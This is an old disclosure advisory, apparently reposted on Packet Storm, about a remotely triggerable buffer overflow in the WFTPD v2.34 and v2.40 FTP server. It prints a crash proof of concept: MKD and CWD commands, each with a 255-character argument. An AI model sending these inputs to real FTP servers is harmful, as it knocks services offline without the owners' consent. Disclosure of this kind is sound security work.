The WFTPD v2.34,v2.40 Server and earlier a vulnerable to remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system.
1da511ef5ea23df545a0b22c5a4538820e140e48715c156edb886c816c2c16b1From: Luciano Martins <luck@USSRBACK.COM>
Subject: WFTPD v2.40 FTPServer remotely exploitable buffer overflow
vulnerability
We found in the WFTPD v2.34,v2.40 Server and earlier a vulnerable to
remotely exploitable buffer overflow. This can result in a denial of service
and at worst in arbitrary code being executed on the system.
The vulnerabilities are the conjunction of two large commands the MKD and
CWD if they are passed an argument a string exact of 255 characters, If
this 2 large commands are passed in order program crash.
Tested in: Windows 98 / Windows Nt
Example:
First command
MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Second command
CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Crash.....Overflow.
Luck Martins
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
WWW.USSRBACK.COM
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed